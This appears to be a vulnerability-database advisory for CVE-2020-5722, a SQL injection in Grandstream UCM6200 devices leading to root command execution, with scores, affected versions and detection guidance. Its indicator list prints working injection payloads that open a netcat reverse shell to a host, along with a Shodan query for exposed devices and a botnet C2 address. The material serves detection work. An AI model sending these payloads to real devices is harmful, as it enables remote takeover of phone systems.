cbcvebase.
CVE-2020-5722
published 2020-03-23

CVE-2020-5722: The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use…

PriorityP196critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-07-28
Exploited in the wild
EPSS
83.93%
99.7th percentile
The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17.

Affected

1 ranges
VendorProductVersion rangeFixed in
grandstreamucm6200_firmware< 1.0.19.201.0.19.20

Detection & IOCsextracted from sources · hover to see the quote

urlhttps://<rhost>:8089/cgi
commandaction=sendPasswordEmail&user_name=admin' or 1=1--`;`nc${IFS}<lhost>${IFS}<lport>${IFS}-e${IFS}/bin/sh`;`
commandaction=sendPasswordEmail&user_name=admin'+or+1=1--`;`ping${IFS}{{interactsh-url}}`;`
commandadmin' or 1=1--`;`nc${IFS}192.168.2.107${IFS}1270${IFS}-e${IFS}/bin/sh`;`
path/cgi
cookieTRACKID
path/tmp/
  • Detect exploitation attempts by monitoring HTTP POST requests to /cgi with action=sendPasswordEmail and SQL injection metacharacters (e.g., ' or 1=1--) in the user_name parameter.
  • The exploit payload uses shell metacharacters injected via popen(): look for backtick-wrapped commands and ${IFS} substitution in HTTP POST body targeting the user_name parameter.
  • Hoaxcalls C2 bot nicks always start with 'XTC|' followed by 9 random characters — use this pattern to detect infected hosts communicating over IRC.
  • Palo Alto Networks threat prevention signatures 57897 and 57892 cover active exploitation of CVE-2020-5722 and CVE-2020-8515 respectively.
  • Shodan query 'ssl:"Grandstream" "Set-Cookie: TRACKID"' identifies internet-exposed Grandstream UCM62xx devices potentially vulnerable to CVE-2020-5722.
  • The Hoaxcalls malware uses XOR key 0xEC (derived from 5 table keys) to encrypt strings; decrypted marker string 'hubnr and vbrxmr was here' at index 0x21 can be used as a memory/binary signature.
  • Monitor for outbound IRC connections to 178.32.148.5 on TCP port 1337 as a C2 beacon indicator for Hoaxcalls-infected devices.
  • The exploit targets the sendPasswordEmail action on the /cgi endpoint over HTTPS port 8089; alert on unauthenticated POST requests to this endpoint from external IPs.
  • ·The shell metacharacter injection vector (RCE) was inadvertently patched in 1.0.19.20 as a side-effect of fixing CVE-2019-10662; the underlying SQL injection was only fully patched in 1.0.20.17. Devices on 1.0.19.x are still vulnerable to HTML injection via the same endpoint.
  • ·Hoaxcalls group 2 and 3 samples move propagation out of flooder commands and execute it at startup, and the malicious HTTP requests used differ slightly from group 1 — detection rules should account for all three payload variants.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.